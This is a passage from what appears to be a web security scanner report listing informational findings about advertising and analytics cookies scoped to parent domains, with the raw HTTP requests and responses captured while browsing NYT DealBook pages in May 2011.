GET /adsc/d908257/6/911744/decide.php?ord=1305200304 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:45 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Wed, 12 May 2010 11:39:44 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4_911744-6-1; expires=Mon, 02 Jul 2012 03:39:45 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E_908257-ON6)M-0; expires=Mon, 02-Jul-2012 03:39:45 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.26. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/200214693344/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693344/decide.php?ord=1305198953 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-4; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.27. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/200214693345/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693345/decide.php?ord=1305199695 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-c; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_200214693345-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.28. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/200214693346/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/200214693346/decide.php?ord=1305198949 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a206
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:50 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.29. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912024/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912024/decide.php?ord=1305198950 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a206
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:15:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-.66)M-0; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.30. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912025/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912025/decide.php?ord=1305199695 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-c; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_912025-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.31. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912026/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912026/decide.php?ord=1305199664 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-0; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:46 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:27:45 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1_912026-2-1; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-D; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.32. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912027/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912027/decide.php?ord=1305199643 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2; LP=1305126639

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:25 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:27:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615-(E6)M-0; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.33. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3005403&rn=909564512&c7=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&c4=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&c5=business%20day&c8=Private%20Equity%20Has%20a%20Horse%20in%20the%20Race%20-%20NYTim&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 11:04:16 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 11:04:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2391347&PluID=0&w=728&h=90&ord=2011.05.12.11.02.51&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA9vHV0000000001uA9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:15 GMT
Connection: close
Content-Length: 1885

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

13.35. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

